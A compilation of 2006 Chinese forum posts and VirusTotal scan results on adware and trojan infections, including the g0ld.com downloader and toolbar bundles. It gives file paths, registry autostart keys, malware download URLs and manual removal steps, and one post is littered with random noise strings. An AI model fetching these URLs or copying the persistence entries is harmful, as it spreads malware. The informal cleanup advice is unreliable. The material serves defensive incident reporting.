F-Prot4 4.2.1.29 12.05.2006  no virus found
Ikarus T3.1.0.26 12.05.2006 Backdoor.Win32.PcClient.GV
Kaspersky 4.0.2.24 12.06.2006  no virus found
McAfee 4911 12.05.2006  no virus found
Microsoft 1.1804 12.06.2006  no virus found
NOD32v2 1904 12.06.2006 probably unknown NewHeur_PE virus
Norman 5.80.02 12.05.2006  no virus found
Panda 9.0.0.4 12.06.2006 Suspicious file
Prevx1 V2 12.06.2006  no virus found
Sophos 4.12.0 12.06.2006 Mal/Packer
Sunbelt 2.2.907.0 11.30.2006  no virus found
TheHacker 6.0.3.130 12.06.2006  no virus found
UNA 1.83 12.05.2006  no virus found
VBA32 3.11.1 12.05.2006  no virus found
VirusBuster 4.3.15:9 12.05.2006 no virus found

STATUS: FINISHEDComplete scanning result of "L_hy50..pif", received in VirusTotal at 12.06.2006, 15:59:13 (CET).

Antivirus Version Update Result
AntiVir 7.2.0.49 12.06.2006 HEUR/Crypted.E
Authentium 4.93.8 12.05.2006  no virus found
Avast 4.7.892.0 12.06.2006  no virus found
AVG 386 12.06.2006  no virus found
BitDefender 7.2 12.06.2006  no virus found
CAT-QuickHeal 8.00 12.05.2006 (Suspicious) – DNAScan
ClamAV devel-20060426 12.06.2006  no virus found
DrWeb 4.33 12.06.2006 BackDoor.Pomax
eSafe 7.0.14.0 12.06.2006 suspicious Trojan/Worm
eTrust-InoculateIT 23.73.78 12.06.2006  no virus found
eTrust-Vet 30.3.3234 12.06.2006  no virus found
Ewido 4.0 12.05.2006  no virus found
Fortinet 2.82.0.0 12.06.2006 suspicious
F-Prot 3.16f 12.05.2006  no virus found
F-Prot4 4.2.1.29 12.05.2006  no virus found
Ikarus T3.1.0.26 12.05.2006 Trojan-Downloader.Win32.Small.czl
Kaspersky 4.0.2.24 12.06.2006  no virus found
McAfee 4911 12.05.2006 New Malware.w
Microsoft 1.1804 12.06.2006  no virus found
NOD32v2 1904 12.06.2006  no virus found
Norman 5.80.02 12.05.2006  no virus found
Panda 9.0.0.4 12.06.2006 Suspicious file
Prevx1 V2 12.06.2006 Trojan.Downloader
Sophos 4.12.0 12.06.2006 Mal/Packer
Sunbelt 2.2.907.0 11.30.2006  no virus found
TheHacker 6.0.3.130 12.06.2006  no virus found
UNA 1.83 12.05.2006  no virus found
VBA32 3.11.1 12.05.2006  no virus found
VirusBuster 4.3.15:9 12.05.2006 no virus found

2006-12-6 21:49:03 1095 SF\\shengfang G:\\TEMP\\soh4.exe G:\\TEMP\\nsj7.tmp\\nsSCM.dll 防间谍程序最大保护:禁止所有程序从 Temp 文件夹运行文件
#1  搜狐娱乐播报的一个程序被阻挡了

程序:
C:\\DOCUMENTS AND SETTINGS\\ADMINISTRATOR\\LOCAL SETTINGS\\TEMP\\SOH4B.EXE
木马程序生成以下文件:
1) C:\\DOCUMENTS AND SETTINGS\\ADMINISTRATOR\\LOCAL SETTINGS\\TEMP\\NSY4E.TMP\\NSSCM.DLL
2) C:\\DOCUMENTS AND SETTINGS\\ADMINISTRATOR\\LOCAL SETTINGS\\TEMP\\NSY4E.TMP\\KILLPROCDL

木马名称:未知后门程序

程序:
C:\\DOCUMENTS AND SETTINGS\\ADMINISTRATOR\\LOCAL SETTINGS\\TEMP\\NSM53.TMP\\NSSCM.DLL
是木马程序!
已成功阻止其运行,是否要删除此文件?

木马名称:未知后门程序

程序:
C:\\DOCUMENTS AND SETTINGS\\ADMINISTRATOR\\LOCAL SETTINGS\\TEMP\\NSM53.TMP\\KILLPROCDLL.DLL
是木马程序!
kougou搜狗初步测试手记 申精
作者: 魔帅   发表日期: 2006-03-29 12:57    复制链接   收藏
TAG:
测试环境：WindowsXP PRO+SP2 YVar` R8 
安全工具：卡巴Anti-Virus Personal最新病毒库 q4= " /u 
天网网络防火墙2.8.100测试版 JUp$O(aY 
辅助工具：IceSword,RegMon,超级兔子v7.45个人版，木马辅助查找器2005 6 TS0 MI 
PE-SCAN(程序壳的检测程序）PEID（外壳检测程序） 0oLepM~ 
搜狗版本：1.2.1.5(从安装程序属性里看到的）从官方下载 www.yippeesoft.com &line;6iB,UUH 

测试前的准备： /$X&Th3 
首先为了安全起见，用超级兔子备份了注册表文件，并在IceSword里列出所有进程（包括可以被Rootkit隐藏起来的进程）作了记录，对系统服务也作了记录。用卡巴对搜狗安装程序进行扫描，未发现病毒。PE-SCAN扫描结果为UPX壳，用脱壳软件脱去UPX壳后，再次用卡巴扫描，还是未发现病毒。PEID检测结果为Nullsoft PiMP Stub [Nullsoft PiMP SFX] （我没见过，所以不知道这是什么东西） www.yippeesoft.com /5m,wM Qi 

测试开始： pucMg;d 
先打开木马辅助程序并使用硬盘监视工具（监视搜狗对硬盘的读写情况）还有注册表监视工具，运行安装程序，天网开始警报Rundll32.exe要求访问网络，访问的是网站端口80，临时选择放行，进入安装界面，跳出对话框问是否同意安装（这里和别人说的不一样，它至少还提示是否安装，别人说是自动安装，这个我不是很清楚），回到硬盘监视工具，未发现有硬盘读写记录（看来搜狗没开始安装）。选择“是”安装，硬盘检测工具开始记录，好多，先列出些重要的东西： ^m&line;Lsne 
修改 C:\\WINDOWS\\system32\\config\\software.LOG ?$n\’M%a wF 
修改 C:\\DOCUME~1\\WSKAKA~1.GTR\\LOCALS~1\\Temp\\nsnEA.tmp\\ioSpecial.ini L1&zzS4R 
新建 C:\\DOCUME~1\\WSKAKA~1.GTR\\LOCALS~1\\Temp\\nsnEA.tmp\\FindProcDLL.dll AU#ux. 
修改 C:\\DOCUME~1\\WSKAKA~1.GTR\\LOCALS~1\\Temp\\nsnEA.tmp\\KillProcDLL.dll（看这个DLL名字不怎么友善） ;(0sZ,ONx 
修改 C:\\Documents and Settings\\WS.Kakashi.GTR-STUDIO\\Local Settings\\Temporary Internet Files\\Content.IE5\\U0Q7AYPJ\\search[1] IjU(<m@;3U 
修改 C:\\Documents and Settings\\WS.Kakashi.GTR-STUDIO\\NTUSER.DAT.LOG /*nWW83=/ 
新建 C:\\DOCUME~1\\WSKAKA~1.GTR\\LOCALS~1\\Temp\\nsnEA.tmp\\nsSCM.dll </caRQv" 
修改 C:\\WINDOWS\\system32\\config\\software.LOG（再次修改了这个文件，不知道是什么原因） ~!tsl?m 
新建 C:\\Program Files\\P4P\\cookieimp.exe（进入正题了） Foh&leftsign;G( 
修改 C:\\Program Files\\P4P\\cookieimp.exe（又不明白了，刚建好就修改？） vC8M\’%:yV 
修改 C:\\Program Files\\P4P\\p2psvr.exe（什么时候建立的） ;?#:AQZ>q\\ 
修改 C:\\Program Files\\P4P\\ToolBar.dll（什么时候建立的） Z/g 4E&rightsign;<p 
修改 C:\\WINDOWS\\system32\\config\\software.LOG（看来是在里面写入些安装信息） \\%~$w7&line;M 
修改 C:\\Program Files\\P4P\\ToolBar.dll（不知道在改什么哦） sy6NJ 
新建 C:\\Program Files\\P4P\\sodaie.dll ?!EW W
?m 
新建 C:\\Program Files\\P4P\\autolink.dll c(FoD5;uyT 
新建 C:\\Program Files\\P4P\\encyclopedia.map :dU]+0@kc 
新建 C:\\WINDOWS\\system32\\socul.dll PDNE0sw 
新建 C:\\WINDOWS\\system32\\unsocul.exe 5y,R*l:1 
新建 C:\\Program Files\\P4P\\pattern.txt  ^@[ u^ 
新建 C:\\Program Files\\P4P\\dl.htm b9Z$H1a 
新建 C:\\Program Files\\P4P\\cx.htm AgmN9!F^w 
新建 C:\\Program Files\\P4P\\00000000-0000-0000-0000-000000000000.zip gasRNVoF9 
新建 C:\\Program Files\\P4P\\AD（晕，开始装广告了） La^!Ph! 
新建 C:\\Program Files\\P4P\\AD\\AD1.html )K)4
gPO@ 
新建 C:\\Program Files\\P4P\\dlmgr.dll Va&line;yl7MD 
新建 C:\\WINDOWS\\system32\\SODAHK.DLL 9&leftsign;uCq&rightsign;w/Y 
新建 C:\\Program Files\\P4P\\rss.dll  _h>#Ego 
新建 C:\\Program Files\\P4P\\feed.dll \’0LyG1"EA% 
新建 C:\\Program Files\\P4P\\css\\css.txt o?c&leftsign;%Y 
新建 C:\\Program Files\\P4P\\css\\title.css kG&line;__" 
删除 C:\\Program Files\\P4P\\cookieimp.exe（难道这个是临时安装程序？） y8#^~.k\’ 
修改 C:\\Program Files\\P4P\\p2psvr.exe ; drX#(G 
新建 C:\\Documents and Settings\\WS.Kakashi.GTR-STUDIO\\Application Data\\p4p\\dlmgr.dat ;W:;8 
。。。。。。省略若干信息 igWv0H3t 
安装进入尾声，大概99%左右，如潮水版的天网警报响了，又是rundll32要求访问网络，还是网站端口，结果过多的警报让系统暂时停止了响应（可怕呀），终于装好搜狗，跳出个网页，是对狗的介绍，然后跳出了个令人期待的网页–广告！（愤怒中）回到注册表监视，结果我发现自己犯了个错误，忘记排除干扰，好多是explorer.exe和QQ.exe对注册表的访问，没找到有价值的信息（其实是有的，但是面对几屏幕的消息，我是没信心了），检查浏览器多了条工具栏。 1d# d6iP
 
删除： yei`CO^< 
不断弹出的广告实在让我心烦，开始尝试手动删除,IE->工具->internet选项->程序->管理加载项，禁用了所有sohu的DLL文件，重起IE，好干净呀。 – 6^vc( 
检测开机程序，未发现新建过的启动项目痕迹。直接来到Program File\\P4P里，发现有个uninstall.exe，运行后提示卸载了，并让我重起电脑，但是我发现卸载后还残留了几个DLL文件sodaie.dll,ToolBar.dll,autolink.dll,尝试手动删除，有程序在访问，不能删除，立刻使用icesword检测，发现是iexplorer.exe调用了这几个文件，关闭IE，删除P4P文件夹，顺利删除。 www.yippeesoft.com u*$/o 

后记：这样删除后并没发现有任何不良效果，系统还和以前一样，只是用超级兔子检测时发现了一个东西让我很疑惑： (V
NK
 
在内存中找到以下可疑程序： www.yippeesoft.com \\:[fNo 

找到未知IE插件：SohuDAIEHelper g~@$J2 
我在进程里始终无法找到这个东西，如果有哪位知道的话请告知，先谢过了^^ www.yippeesoft.com _V*- (`nD 

最后说几句：说实话没想到那么容易删除搜狗，没像别人所说的那么可怕（也许我搜狗版本和大家不一样），所以此文只是给大家个参考，如果有什么错误的话，请指正，小弟不胜感激 www
STATUS: FINISHEDComplete scanning result of "G_Server2006.exe", received in VirusTotal at 12.06.2006, 16:04:24 (CET).

Antivirus Version Update Result
AntiVir 7.2.0.49 12.06.2006 BDS/Hupigon.LQ.1
Authentium 4.93.8 12.05.2006 Possibly a new variant of W32/Rootkit-Backdoor-based!Maximus
Avast 4.7.892.0 12.06.2006  no virus found
AVG 386 12.06.2006  no virus found
BitDefender 7.2 12.06.2006  no virus found
CAT-QuickHeal 8.00 12.05.2006 (Suspicious) – DNAScan
ClamAV devel-20060426 12.06.2006  no virus found
DrWeb 4.33 12.06.2006 BackDoor.Pigeon.531
eSafe 7.0.14.0 12.06.2006 suspicious Trojan/Worm
eTrust-InoculateIT 23.73.78 12.06.2006  no virus found
eTrust-Vet 30.3.3234 12.06.2006  no virus found
Ewido 4.0 12.05.2006  no virus found
Fortinet 2.82.0.0 12.06.2006 W32/Hupigon.BMM!tr.bdr
F-Prot 3.16f 12.05.2006 Possibly a new variant of W32/Rootkit-Backdoor-based!Maximus
F-Prot4 4.2.1.29 12.05.2006 W32/Rootkit-Backdoor-based!Maximus
Ikarus T3.1.0.26 12.05.2006  no virus found
Kaspersky 4.0.2.24 12.06.2006  no virus found
McAfee 4911 12.05.2006  no virus found
Microsoft 1.1804 12.06.2006  no virus found
NOD32v2 1904 12.06.2006  no virus found
Norman 5.80.02 12.05.2006 W32/Hupigon.YOS
Panda 9.0.0.4 12.06.2006 Bck/Hupigon.APA
Prevx1 V2 12.06.2006  no virus found
Sophos 4.12.0 12.06.2006 Mal/Packer
Sunbelt 2.2.907.0 11.30.2006  no virus found
TheHacker 6.0.3.130 12.06.2006  no virus found
UNA 1.83 12.05.2006  no virus found
VBA32 3.11.1 12.05.2006 suspected of Backdoor.PcClient.22
VirusBuster 4.3.15:9 12.05.2006 no virus found
STATUS: FINISHEDComplete scanning result of "adout.exe", received in VirusTotal at 12.06.2006, 16:06:52 (CET).

Antivirus Version Update Result
AntiVir 7.2.0.49 12.06.2006 TR/Aganti.A.2
Authentium 4.93.8 12.05.2006  no virus found
Avast 4.7.892.0 12.06.2006 Win32:Trojan-gen. &leftsign;VC&rightsign;
AVG 386 12.06.2006  no virus found
BitDefender 7.2 12.06.2006 Adware.Toolbar159.A
CAT-QuickHeal 8.00 12.05.2006  no virus found
ClamAV devel-20060426 12.06.2006  no virus found
DrWeb 4.33 12.06.2006 Trojan.DownLoader.10794
eSafe 7.0.14.0 12.06.2006  no virus found
eTrust-InoculateIT 23.73.78 12.06.2006  no virus found
eTrust-Vet 30.3.3234 12.06.2006  no virus found
Ewido 4.0 12.05.2006  no virus found
Fortinet 2.82.0.0 12.06.2006  no virus found
F-Prot 3.16f 12.05.2006  no virus found
F-Prot4 4.2.1.29 12.05.2006  no virus found
Ikarus T3.1.0.26 12.05.2006 Trojan-Downloader.10794
Kaspersky 4.0.2.24 12.06.2006  no virus found
McAfee 4911 12.05.2006  no virus found
Microsoft 1.1804 12.06.2006  no virus found
NOD32v2 1904 12.06.2006  no virus found
Norman 5.80.02 12.05.2006  no virus found
Panda 9.0.0.4 12.06.2006  no virus found
Prevx1 V2 12.06.2006 Malicious
Sophos 4.12.0 12.06.2006 159 ToolBar
Sunbelt 2.2.907.0 11.30.2006  no virus found
TheHacker 6.0.3.130 12.06.2006  no virus found
UNA 1.83 12.05.2006  no virus found
VBA32 3.11.1 12.05.2006 Trojan.DownLoader.10794
VirusBuster 4.3.15:9 12.05.2006 no virus found
STATUS: FINISHEDComplete scanning result of "ebbeeeia.sys", received in VirusTotal at 12.06.2006, 16:12:51 (CET).

Antivirus Version Update Result
AntiVir 7.2.0.49 12.06.2006 ADSPY/Cdnup.A.8
Authentium 4.93.8 12.05.2006  no virus found
Avast 4.7.892.0 12.06.2006  no virus found
AVG 386 12.06.2006 Downloader.Generic2.YNL
BitDefender 7.2 12.06.2006  no virus found
CAT-QuickHeal 8.00 12.05.2006  no virus found
ClamAV devel-20060426 12.06.2006  no virus found
DrWeb 4.33 12.06.2006  no virus found
eSafe 7.0.14.0 12.06.2006  no virus found
eTrust-InoculateIT 23.73.78 12.06.2006  no virus found
eTrust-Vet 30.3.3234 12.06.2006  no virus found
Ewido 4.0 12.05.2006 Adware.Cdn
Fortinet 2.82.0.0 12.06.2006  no virus found
F-Prot 3.16f 12.05.2006  no virus found
F-Prot4 4.2.1.29 12.05.2006  no virus found
Ikarus T3.1.0.26 12.05.2006  no virus found
Kaspersky 4.0.2.24 12.06.2006  no virus found
McAfee 4911 12.05.2006  no virus found
Microsoft 1.1804 12.06.2006  no virus found
NOD32v2 1904 12.06.2006 Win32/TrojanDownloader.Small.NPA
Norman 5.80.02 12.05.2006  no virus found
Panda 9.0.0.4 12.06.2006  no virus found
Prevx1 V2 12.06.2006  no virus found
Sophos 4.12.0 12.06.2006  no virus found
Sunbelt 2.2.907.0 11.30.2006  no virus found
TheHacker 6.0.3.130 12.06.2006  no virus found
UNA 1.83 12.05.2006  no virus found
VBA32 3.11.1 12.05.2006 suspected of Embedded.Trojan.Win32.TrojanDownloader.Small.NPA
VirusBuster 4.3.15:9 12.05.2006 no virus found

1226 mssvc32.dll g0ld.com.exe

病毒文件 g0ld.com.exe mssvc32.dll

服务里面多了
[Transaction Provisioning Service / TransactionService]
O23 – Service: Transaction Provisioning Service (TransactionService) – Unknown owner
<C:\\WINDOWS\\system32\\g0ld.com.exe><
O23 – 未知 – TransactionService – C:\\WINDOWS\\system32\\g0ld.com.exe
资料
用SRENG删除以下项目

启动项目
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellExecuteHooks]
<&leftsign;1A404685-7563-4d02-B0F6-58B308A406A9&rightsign;><c:\\program files\\internet explorer\\uwyolmfq.dll> [N/A]
==================================
服务
[AutoUpgrade / AutoUpgrade]
<C:\\WINDOWS\\System32\\svchost.exe -k AutoUpgrade–>C:\\WINDOWS\\system32\\qosname32.dll><N/A>
<C:\\WINDOWS\\System32\\Internet.exe><N/A>
[[远程管理计算机的协议 / Remonte rpc]
<C:\\WINDOWS\\system32\\1.exe><N/A>
[Remote Procedure Call System(RPCS) / RpcS]
<C:\\WINDOWS\\system32\\RpcS.exe><N/A>
[Transaction Provisioning Service / TransactionService]
<C:\\WINDOWS\\system32\\5.exe><N/A>

重启后删除以上项目的相关文件以及下面两个文件,删除不了的用KILLBOX
C:\\WINDOWS\\System32\\Internet.dll
C:\\WINDOWS\\System32\\InternetKey.DLL

不小心点了个垃圾邮件，然后金山毒霸就挂了，吭都没吭一声，真他妈的的差劲。系统进程只发现有"iexplore"比较可疑，另外就是//windows/system32中有iexplore.exe.删掉这个可疑文件后，但注册表中找不到相应的键值。不知道是什么病毒的新变异，反正俺是搞不定了。
我也中了这个病毒，在windows\\system32里面有mssvc32.dll有病毒。诺顿查出来了，只是能查不能杀。病毒每次开机时自动运行iexplore，体现在进程里多一个system的iexplore.exe.

现在每次开机时诺顿都报毒。只能手工把进程里的iexplore杀掉。
开机连接网络，打开IE浏览器就自动连接网址[url]www.54evil.com[/url]下载一个MS-DOS应用程序g0ld.com.exe,并且自动运行它，然后在c:\\windows里生成一个lsa.exe,卡巴斯基报告说g0ld.com.exe是Trojan-Downloader.Win32.VB.ahv
关闭IE后再打开就不会再自动下载这个木马了，但是下次开机后又会出现这种情况。一次开机IE只自动下载一次这个木马，用ewido杀毒只查出两个ADWare，卡巴斯基也查不出。
g0ld.com.exe这个木马是自动下载到临时文件夹里的，手动清除 g0ld.com.exe 和 lsa.ex后下次开机打开IE后仍然还会自动下载这个g0ld.com.exe，如果开机后打开Firefox浏览器就不会自动下载这个木马，好像只对IE内核的浏览器会发生自动下载木马的情况。
好几天了我自己实在是搞不定了，急死了啊，请大家帮帮我，谢谢。
一打开IE浏览器就自动连接www.54evil.com下载一个MS-DOS应用程序g0ld.com.exe并且自动运行，然后在C：\\WINDOWS里生成一个lsa.exe。那个g0ld.com.exe卡巴斯基报告是Trojan-
Downloader.Win32.VB.ahv，删掉g0ld.com.exe和lsa.exe后下次开机启动IE浏览器后又会自动下载，都好几天了，实在没办法了，请高人们教我杀掉这个病毒啊！急死了啊我！！！
瑞星防火墙系统状态里显示有个木马，请看一下上传的图片。
开机连接网络打开IE浏览器就自动连接http://www.54evil.com/inc/mm.exe 这个网址,自动下载并运行mm.exe,然后进程中出现g0ld.com.exe,防火墙提示g0ld.com.exe要连接网络上一个地址，拒绝后发现在C:\\WINDOWS里生成一个lsa.exe。
mm.exe杀毒软件报告为 Trojan-Downloader.Win32.VB.ahv
关闭IE浏览器后再打开就不会再自动下载这个mm.exe，但是下次开机后这种情况又会出现，也就是说每次开机IE只下载一次这个mm.exe，如果开机后打开Firefox浏览器就不会自动下载那个mm.exe了，这个木马病毒好像只对IE内核的浏览器起作用。
手动删掉g0ld.exe和lsa.exe后下次开机打开IE还会自动下载那个
mm.exe,这种情况出现好几天了。
我想知道造成这种情况是不是我的电脑中了某种木马，如果是，那这种木马叫什么名字，它在系统内都产生了哪些病毒文件，我应该怎么样杀掉这种木马病毒，请专家们帮帮我，谢谢你们。
g0ld.exe 这个病毒到底怎么杀？？？

最近我上网，在桌面就自动生成一个g0ld.exe的文件，而且在刚开机的时候还不听的弹出好几个DOS的运行的黑框，具体运行什么还来不及看清楚就消失了。

  并且，还没办法打开杀毒软件，像绿鹰PC万能精灵和木马克星都不能打开。

  在WINDOWS安全模式下，也会出现这相同的情况，请高手赐教！！

  晚上在网页浏览的结束的时候，正准备关机，突然发现桌面多了一个图标，就象是一个应用程序的图标，名称是“g0ld”，是一个MS-DOS应用程序，我双击了两下，没有反映，在任务管理器的进程里可以看到，是一个“g0ld.com”的进程，:Q但大概30秒钟就又没有了，我想不通这到底是什么东西，是 病毒吗，还是木马，是刚才上网时带入的，还是电脑里的系统程序，因为我上网的时候也曾有打开过“我的电脑”，我怕也许是不小心把系统程序移到了桌面上，现在删也不敢删，有哪位朋友知道这到底是什么东西吗？

  呵呵，楼主中了下载者病毒，它会在连接到网线的时候自动下载病毒和广告软件，请断网进行全面杀毒，它下载的广告软件可以去天空软件站下载超级兔子解决！超级兔子带卸载王，可以搞定广告软件和恶意绑定主页，以上操作要在断网的前提下进行！！！如果无效，请开机按F8进入安全模式–全面杀毒！断网杀毒！如果连者网线你杀光就会自动下载，直到把你内存消耗光，自动关机，重启后连网又自动关机，直到机器报废为止（下载者病毒擅长以上做法！！）

  g0ld病毒
g0ld.exe,进程为g0 ld.com,?第二个字符为“数字0”，键盘记录程序，可以窃取本地用户密码。
一般不会被反病毒软件查杀。
建议先打开开始，运行msconfig看是否有可疑启动项，有则取掉
使用process explorer查进程，看是否有可疑或文件名的进程，有
则记下路径结束进程后删除文件。
[重要]今天上COOLSEE有异常状况怀疑中毒了的 进来看这帖 （有危险）

COOLSEE已经被种了木马 专盗QQ号和游戏账号 请大家互相转告 今天上过COOLSEE立即升级杀毒软件杀毒 非危言耸听

感染状况如下
系统运行WINRAR 自动运行解压 jh.exe 产生1.exe

搜索看系统里有没有jh.exe 和1.exe 以及g0ld.com

记得打开搜索项里的高级 – 搜索系统隐藏文件

如果要阅览CS 请使用无图模式 查阅

http://www.coolsee.com/bbs/simple/index.php?t115095.html

现象之一是桌面产生了一个1.exe文件

现象2就是不停弹出g0ld.com 不是有效的win32文件

一般系统杀毒软件效果强 防火墙够猛 即时监控到位的杀毒软件 都可能保证你未受感染

其他用瑞星之类次品杀毒软件 又未升级病毒毒 没有开即时的同志们 甚至还有裸奔（啥也没装）的同志们 估计已经中招了

　　
　　具体体现是卡巴疯狂报警, C:\\documents and settings\\***\\local settings\\temp目录下有几个1.exe 2.exe…等文件,被卡巴删了.
　　但有几个 mz.exe/jh.exe/realplayer.exe仍然在系统里运行并试图实现自加载.并且cpu占用率持高不下,系统狂慢.
　　
　　我用超然查看了它们的路径,mz.exe/jh.exe都在temp目录下,还在windows目录下直接建了一个temp目录(windows目录下一般是不存在这个temp目录的).这个好办,直接用超然的批量关闭,然后删除目录,再用autoruns把这几个启动项前面的勾给取消了(autoruns会显示启动项目的所在具体位置和文件,或一些csid控件)
　　
　　但遇到了一点小麻烦,就是那个realplayer.exe,删了重启又有.
　　我只好耐心一个一个查看下去.发现有几个可疑的启动项目,正好在天涯看到一个网友遇到同样的问题,我就把我的确定成功的解决方法写给了他,在这里就偷点懒,直接复制如下:
　　
　　————————–
　　　　这是我在网上找的资料，再帮你细化一下
　　　　
　　　　全手动杀毒…..不过IE目录下的几个sys文件要用卡巴扫描来删，或者用纯DOS启动去删
　　　　
　　　　病毒文件：
　　　　Rinld.sys（C:\\WINDOWS\\system32\\drivers）
　　　　Ravdm.exe（C:\\WINDOWS\\system32）属性隐藏
　　　　TIMPlatform.exe（QQ安装目录，木马把原来的改名为TIMPlatfrom.exe并隐藏，可以去掉隐藏属性弄出来再改回原名）
　　　　system.sys（C:\\Program Files\\Internet Explorer\\PLUGINS）
　　　　system.jmp（C:\\Program Files\\Internet Explorer\\PLUGINS）
　　　　system.bak（C:\\Program Files\\Internet Explorer\\PLUGINS）
　　　　
　　　　解决办法：
　　　　1.开机按F8进入安全模式，进入cmd命令行
　　　　2.删除病毒文件：
　　　　（删除方式为 attrib -h -s -a -r 去掉所有傻逼属性再del文件）
　　　　C:\\program files\\microsoft\\svhost32.exe，记住所有文件都必须先attrib掉
　　　　C:\\WINDOWS\\system32\\realplayer.exe(这个是可能出现的，因为是另一个病毒，如果有，那你也要删掉相关的注册表启动项)
　　　　C:\\WINDOWS\\system32\\drivers\\Rinld.sys
　　　　C:\\WINDOWS\\system32\\Ravdm.exe
　　　　c:\\windows\\system32\\mswdm.exe
　　　　C:\\Program Files\\Tencent\\QQ\\TIMPlatform.exe（删了这个后记得把被隐藏的的TIMPlatfrom显示并改名为TIMPlatform.exe）
　　　　C:\\Program Files\\Internet Explorer\\PLUGINS\\system.sys（这个用卡巴全盘扫描来删好了）
　　　　C:\\Program Files\\Internet Explorer\\PLUGINS\\system.jmp
　　　　C:\\Program Files\\Internet Explorer\\PLUGINS\\system.bak
　　　　
　　　　3.把QQ安装目录的TIMPlatfrom.exe改回原名TIMPlatform.exe（从生成时间可以判断那个是病毒）
　　　　
　　　　4. 删除病毒建立的自启动项：
　　　　[HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellExecuteHooks]
　　　　system.sys="c:\\program files\\internet explorer\\plugins\\system.sys"
　　　　（把system.sys键值删除）
　　　　
　　　　[HKEY_CLASSES_ROOT\\CLSID\\&leftsign;C9953583-932E-4EA1-A04B-4523AAB72C30&rightsign;\\InProcServer32]
　　　　@="C:\\Program Files\\Internet Explorer\\PLUGINS\\system.sys"
　　　　（把&leftsign;C9953583-932E-4EA1-A04B-4523AAB72C30&rightsign;整个删除）
　　　　
　　　　[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer]
　　　　Run/KernelFaultCheckC:\\WINDOWS\\system32\\Ravdm.exe
　　　　（把Run键值删除，因为有些不是这个内容，而是一个控件CSID）
　　　　
　　　　5. 清空一下文件夹，最好是删掉….反正它会重建：
　　　　C:\\Documents and Settings\\（用户名）\\Local Settings\\Temp
　　　　C:\\windows\\ temp
　　　　
　　　　注：上面病毒文件属性是隐藏的，所在要打开查开系统文件和隐藏文件
　　　　另外，你最好下一个autoruns软件把可疑的启动项目显示出来，再双击每个项目到注册表里去删，因为autoruns本身可能删不掉。
　　　　如果还有问题，请给我发消息或在此贴里留言，我会再来看的
　　———————–
　　
　　补充一点,删除启动项一般都可以用autoruns
　　我这里可能遗漏了一些东西,毕竟没当场记录的
　　
　　
　　再来说IE浏览器打开网站时弹出广告的问题.而在进程管理器看不到可疑进程.
　　这种现象可以说是太普遍了,打开百度等大网站都会弹出一个莫名其妙的广告窗口.其实大部分都可以在autoruns里的IE浏览器选项卡里找到一些自启动的dll文件.
　　我今天就碰到了 c:\\windows\\system32\\inetsrv\\csrss.exe和system32\\COMboHEvent.dll这个狗日的病毒.
　　在网上,很多人都说csrss.exe或smss.exe\\winlogon.exe\\svchost.exe等几个是系统进程,不能终止,其实这几个文件如果在 system32目录下就是正常的,但如果在其他目录比如我刚才说的 inetsrv\\csrss.exe,一看就知道是伪装病毒,因为在系统自带的管理器里只能查看进程名不能看到进程的目录.
　　所以我才推荐大家用超然.
　　
　　在超然里将inetsrv\\csrss.exe强制结束系统进程后,再到system32目录将inetsrv目录直接删掉.可是过了一会儿,发现这个进程又起来了,目录也又建立了.
　　而系统进程里,没有发现明显的可疑进程在保护它.
　　我进到安全模式里,再删一遍,启动后又有了…..这时,我猜它可能是利用了某个系统进程挂载实现自身的加载.在网上查资料时,有人说到了explorer.exe挂载了它.(以下谈到的csrss都是指的inetsrv\\csrss.exe这个病毒,而不是正常的系统进程)
　　于是,我在系统自带的任务管理器将explorer.exe关掉(超然关它会再启动),再在超然里把csrss.exe关掉.这时桌面没了,不用管他.我们只需要之前运行好超然\\命令行和autoruns就行,关掉桌面后还可以用alt+tab键切换的.
　　删掉inetsrv\\csrss.exe,再用autoruns把IE选项里的java 2勾去掉,重起,发现它还是存在.
　　
　　我这才想到了netstat命令.
　　刚开机,马上执行netstat -a -n -o,发现有一个进程开机便连接某外网IP的80端口,用cap捕捉到它下载了数据.再根据这个进程的pid到超然里一查,我晕,居然是svchost.exe,难怪我平时系统进程里的svchost.exe只有5个,这几天却有6个……
　　但是大家要注意,这个svchost.exe的确是system32目录下的正常进程,它用来调用系统的一些服务,所以会有多个在运行,这也给了某些病毒的可用之机.
　　我到控制面板-管理工具-服务 里,发现有个服务名字是fsadsafsd这样奇怪的(具体名字不记得了)东西是用的svchost.exe,而服务也没有相关介绍,我将它禁用并停止,在用上面的办法将combohevent.dll inetsrv\\csrss.exe删掉,在autoruns里把java 2再勾去删掉.
　　启动……ok了,世界清净了

[ 此贴被TECHNOMAGE在2006-09-09 20:39重新编辑 ]

1214 microapmddt.dll UPX 流氓

家里电脑IE的安全等级设置了 信任控件 和  信任控件执行脚本，结果下载软件的时候中招了 晕
幸好有防火墙，提示SYSYTEM32下UPX访问网络，赶快DENNY，然后删除掉
IE打开一看，加载项目多了一个 microapmddt.dll，反注册，REGSVR32 /U 然后删除 基本OK

资料
2.O02 – 浏览器辅助对象(BHO) – MacroMediapd，MacroMediapd，
CLSID：&leftsign;B8CCDD47-38E4-4CD2-B7FA-3B4B690F74BD&rightsign;
相关文件：C:\\WINDOWS\\system32\\microapmddt.dll
安全等级：未知

罪犯二:dtservice dtap 最新变种:XP21TM~1.DLL

犯罪表现
  用户中招后常会莫名其妙弹出广告网页,有的因为已经被杀毒软件查杀，开机会弹出启动项提示找不到该文件。如图：[attach]259118[/attach]
如果安装有防火墙的用户还会提示:拦截到系统访问edmchina网站.在系统内生成以下几个文件：
%Temp%\\RarSFX0\\dtservice.dll
%Temp%\\RarSFX0\\ext\\dtdl.dll
%Temp%\\RarSFX0\\ext\\dtsm.dll
%Windows%\\dtapconfig
%System%\\dtap.dll
或生成%Windows%\\dtapconfig
%System%\\dtap.dll
%System%\\dtservice.dll
%System%\\ext\\dtdl.dll
%System%\\ext\\dtsm.dll
并联网下载一些该广告病毒本身的配置信息(以方便升级变种)：
http://ww*w.edmchina.com/download/dtapconfig
http://ww*w.edmchina.com/download/update3
http://ww*w.edmchina.com/download/clist
还可能会下载另外的插件：
http://ww*w.qqbao.net/download/microapmddt.dll（MacroMediapd）
http://ww*w.edmchina.com/download/xresdmr（这个有加密）
